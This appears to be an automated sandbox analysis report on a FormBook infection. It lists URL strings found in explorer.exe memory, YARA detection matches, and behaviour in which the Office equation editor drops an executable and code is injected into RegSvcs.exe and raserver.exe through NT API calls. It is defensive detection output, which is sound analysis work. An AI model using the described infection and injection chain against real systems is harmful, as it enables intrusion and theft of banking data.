            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2197307485.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.2205387909.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: document is protected " t9 19 20 21 22 23 Open the document in If this document was 24 Mkroso
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A015C NtQueryInformationProcess,4_2_003A015C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A014F NtQueryInformationProcess,4_2_003A014F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0B59 NtQueryInformationProcess,4_2_003A0B59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419D50 NtCreateFile,5_2_00419D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E00 NtReadFile,5_2_00419E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E80 NtClose,5_2_00419E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,5_2_00419F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419D4B NtCreateFile,5_2_00419D4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419DFE NtReadFile,5_2_00419DFE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419DA4 NtCreateFile,5_2_00419DA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E7A NtClose,5_2_00419E7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419F2B NtAllocateVirtualMemory,5_2_00419F2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,5_2_009100C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00910048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,5_2_00910078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,5_2_0090F9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,5_2_0090F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0090FAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0090FAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0090FBB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0090FB68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0090FC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0090FC60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,5_2_0090FD8C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0090FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0090FEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0090FED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,5_2_0090FFB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009110D0 NtOpenProcessToken,5_2_009110D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910060 NtQuerySection,5_2_00910060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009101D4 NtSetValueKey,5_2_009101D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091010C NtOpenDirectoryObject,5_2_0091010C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00911148 NtOpenThread,5_2_00911148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009107AC NtCreateMutant,5_2_009107AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F8CC NtWaitForSingleObject,5_2_0090F8CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00911930 NtSetContextThread,5_2_00911930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090F938 NtWriteFile,5_2_0090F938
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FAB8 NtQueryValueKey,5_2_0090FAB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FA20 NtQueryInformationFile,5_2_0090FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FA50 NtEnumerateValueKey,5_2_0090FA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FBE8 NtQueryVirtualMemory,5_2_0090FBE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FB50 NtCreateKey,5_2_0090FB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC30 NtOpenProcess,5_2_0090FC30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00910C40 NtGetContextThread,5_2_00910C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FC48 NtSetInformationFile,5_2_0090FC48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00911D80 NtSuspendThread,5_2_00911D80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FD5C NtEnumerateKey,5_2_0090FD5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FE24 NtWriteVirtualMemory,5_2_0090FE24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FFFC NtCreateProcessEx,5_2_0090FFFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0090FF34 NtQueueApcThread,5_2_0090FF34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F700C4 NtCreateFile,LdrInitializeThunk,7_2_01F700C4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F707AC NtCreateMutant,LdrInitializeThunk,7_2_01F707AC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F9F0 NtClose,LdrInitializeThunk,7_2_01F6F9F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F900 NtReadFile,LdrInitializeThunk,7_2_01F6F900
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_01F6FBB8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01F6FB68
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FB50 NtCreateKey,LdrInitializeThunk,7_2_01F6FB50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_01F6FAE8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_01F6FAD0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk,7_2_01F6FAB8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_01F6FDC0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FD8C NtDelayExecution,LdrInitializeThunk,7_2_01F6FD8C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_01F6FC60
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FFB4 NtCreateSection,LdrInitializeThunk,7_2_01F6FFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_01F6FED0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F701D4 NtSetValueKey,7_2_01F701D4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F71148 NtOpenThread,7_2_01F71148
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7010C NtOpenDirectoryObject,7_2_01F7010C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F710D0 NtOpenProcessToken,7_2_01F710D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70078 NtResumeThread,7_2_01F70078
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70060 NtQuerySection,7_2_01F70060
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70048 NtProtectVirtualMemory,7_2_01F70048
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F71930 NtSetContextThread,7_2_01F71930
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F938 NtWriteFile,7_2_01F6F938
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6F8CC NtWaitForSingleObject,7_2_01F6F8CC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FBE8 NtQueryVirtualMemory,7_2_01F6FBE8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FA50 NtEnumerateValueKey,7_2_01F6FA50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FA20 NtQueryInformationFile,7_2_01F6FA20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F71D80 NtSuspendThread,7_2_01F71D80
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FD5C NtEnumerateKey,7_2_01F6FD5C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC90 NtUnmapViewOfSection,7_2_01F6FC90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F70C40 NtGetContextThread,7_2_01F70C40
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC48 NtSetInformationFile,7_2_01F6FC48
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FC30 NtOpenProcess,7_2_01F6FC30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FFFC NtCreateProcessEx,7_2_01F6FFFC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FF34 NtQueueApcThread,7_2_01F6FF34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FEA0 NtReadVirtualMemory,7_2_01F6FEA0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F6FE24 NtWriteVirtualMemory,7_2_01F6FE24
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139D50 NtCreateFile,7_2_00139D50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139E00 NtReadFile,7_2_00139E00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139E80 NtClose,7_2_00139E80
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139F30 NtAllocateVirtualMemory,7_2_00139F30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139D4B NtCreateFile,7_2_00139D4B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139DA4 NtCreateFile,7_2_00139DA4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139DFE NtReadFile,7_2_00139DFE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139E7A NtClose,7_2_00139E7A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00139F2B NtAllocateVirtualMemory,7_2_00139F2B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E693CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_01E693CE
